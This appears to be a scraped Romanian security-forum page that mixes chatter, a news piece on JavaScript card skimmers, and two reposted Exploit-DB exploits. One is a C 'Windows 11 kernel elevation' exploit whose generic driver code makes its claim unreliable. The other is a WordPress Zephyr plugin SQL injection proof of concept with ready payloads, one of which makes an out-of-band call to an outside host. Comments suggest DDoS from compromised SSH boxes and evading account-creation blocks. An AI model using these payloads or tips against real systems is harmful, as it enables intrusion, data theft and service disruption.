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Ai mai putea adauga, sa gaseasca xss dupa dorks. https://github.com/DevanshRaghav75/bugbounty-dorks/blob/main/dorks/xss_dorks.txt
Felicitari!, tie tata!
Interesant, mulțumim!
Nu, sunt născut în anul 1987 😅😅
Maturizeaza-te kid!
// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : webapps // Vendor Homepage: // Tested on: Windows/Linux // CVE : CVE-2023-28293 #include <windows.h> #include <stdio.h> // The vulnerable driver file name const char *driver_name = "vuln_driver.sys"; // The vulnerable driver device name const char *device_name = "\\\\.\\VulnDriver"; // The IOCTL code to trigger the vulnerability #define IOCTL_VULN_CODE 0x222003 // The buffer size for the IOCTL input/output data #define IOCTL_BUFFER_SIZE 0x1000 int main() { HANDLE device; DWORD bytes_returned; char input_buffer[IOCTL_BUFFER_SIZE]; char output_buffer[IOCTL_BUFFER_SIZE]; // Load the vulnerable driver if (!LoadDriver(driver_name, "\\Driver\\VulnDriver")) { printf("Error loading vulnerable driver: %d\n", GetLastError()); return 1; } // Open the vulnerable driver device device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (device == INVALID_HANDLE_VALUE) { printf("Error opening vulnerable driver device: %d\n", GetLastError()); return 1; } // Fill the input buffer with data to trigger the vulnerability memset(input_buffer, 'A', IOCTL_BUFFER_SIZE); // Send the IOCTL to trigger the vulnerability if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL)) { printf("Error sending IOCTL: %d\n", GetLastError()); return 1; } // Print the output buffer contents printf("Output buffer:\n%s\n", output_buffer); // Unload the vulnerable driver if (!UnloadDriver("\\Driver\\VulnDriver")) { printf("Error unloading vulnerable driver: %d\n", GetLastError()); return 1; } // Close the vulnerable driver device CloseHandle(device); return 0; } BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name) { SC_HANDLE sc_manager, service; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Create the service service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL); if (service == NULL) { error = GetLastError(); if (error == ERROR_SERVICE_EXISTS) { // The service already exists, so open it instead service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } } else { CloseServiceHandle(sc_manager); return FALSE; } } // Start the service if (!StartService(service, 0, NULL)) { error = GetLastError(); if (error != ERROR_SERVICE_ALREADY_RUNNING) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; } BOOL UnloadDriver(LPCTSTR service_name) { SC_HANDLE sc_manager, service; SERVICE_STATUS status; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Open the service service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } // Stop the service if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) { error = GetLastError(); if (error != ERROR_SERVICE_NOT_ACTIVE) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } // Delete the service if (!DeleteService(service)) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; } Source: https://www.exploit-db.com/exploits/51544
Si ce dracu` faci cu un ssh? ma intreb si eu.. urci arhiva udp.pl pe el si dai ddos pe un ssh prins in scanner`ul tau.
Salut! Dacă încerci sa-ti faci conturi cu același IP, facebook îți recunoaște ip-ul, și te blochează automat după crearea contului, încearcă sa-ti faci cont cu un vpn, sau revi cu crearea contului mai târziu.
Bro suntem în anul 2023, tu crezi ca mai funcționează UDP.pl si scan!
De ce nu-ti faci tu niște conturi?
Atac cibernetic la distribuție energie electrica România.
GabrielRo replied to GabrielRo's topic in Stiri securitate
Sau inspirat din filmul Takedown. 😅🤐 -
2022... bro
https://github.com/kennyn510/wpa2-wordlists https://github.com/mishrasunny174/WordLists
Zilele trecute, GROUP-IB (firmă rusească de threath intelligence, renumită la nivel mondial, cunoscută prin legăturile pe care le are cu structurile de law-enforcement de genul INTERPOL) se lăuda pe site-ul lor despre cum au contribuit la capturarea unor lideri Indonezieni ai unei grupări de hoţi de buzunare contemporani sau, pe limbaj tehnic, JavaScript-sniffers, denumită „GetBilling„. Hoţii noştri se pare că ţinteau (şi încă ţintesc, pentru că nu i-au prins pe toţi) site-uri de comerţ on-line din Asia, Europa, Australia şi Americi (deci erau, într-un fel, specialiști ai buzunăritului cibernetic, ce să mai…), pe care le infectau cu un cod JavaScript maliţios care fura datele personale ale clienţilor, precum numărul cărţii de credit, nume, adrese, credenţiale, numere de telefon şi alte date de autentificare pentru diverse sisteme de plăţi virtuale. Cert este că gruparea era urmărită din 2018 şi a fost prinsă în 2020, timp în care ar fi infectat aproape 200 de site-uri (deşi Group-IB spune că numărul este probabil mai ridicat…) şi, în plus, membrii acestuia nu sunt noi în lumea criminalităţii cibernetice. În anul 2019, firma a descoperit încă 19 grupări care utilizează acelaşi mod de operare şi numărul nu poate fi decât în creştere. Ce este de reţinut din a aceste rânduri, ar fi să nu ne expunem cardurile personale pe platforme de plăţi online aşa de lejer şi cel mai sigur ar fi să utilizăm soluţii fin-tech (aka carduri virtuale) de tipul Revolut, Monese, TransferWise, Crypto, BunQ, etc… By the way, operaţiunea din Indonezia se numea NIGHT FURY. Source: https://securitypatch.ro/group-ib-si-hotii-de-buzunare/
# Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi # Date: 14-08-2022 # Exploit Author: Rizacan Tufan # Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated # Software Link: https://wordpress.org/plugins/zephyr-project-manager/ # Vendor Homepage: https://zephyr-one.com/ # Version: 3.2.42 # Tested on: Windows, Linux # CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c) # Description Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks. It has been determined that the data coming from the input field in most places throughout the application are used in=20 the query without any sanitize and validation. The details of the discovery are given below. # Proof of Concept (PoC)=20 The details of the various SQL Injection on the application are given below. ## Endpoint of Get Project Data. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projects Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: project_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7 Type: time-based blind Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP) Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7 Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7 --- ## Endpoint of Get Task Data. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 51 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: task_id (POST) Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 --- ## Endpoint of New Task. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 337 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: task_project (POST) Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 --- Source: https://www.exploit-db.com/exploits/51024
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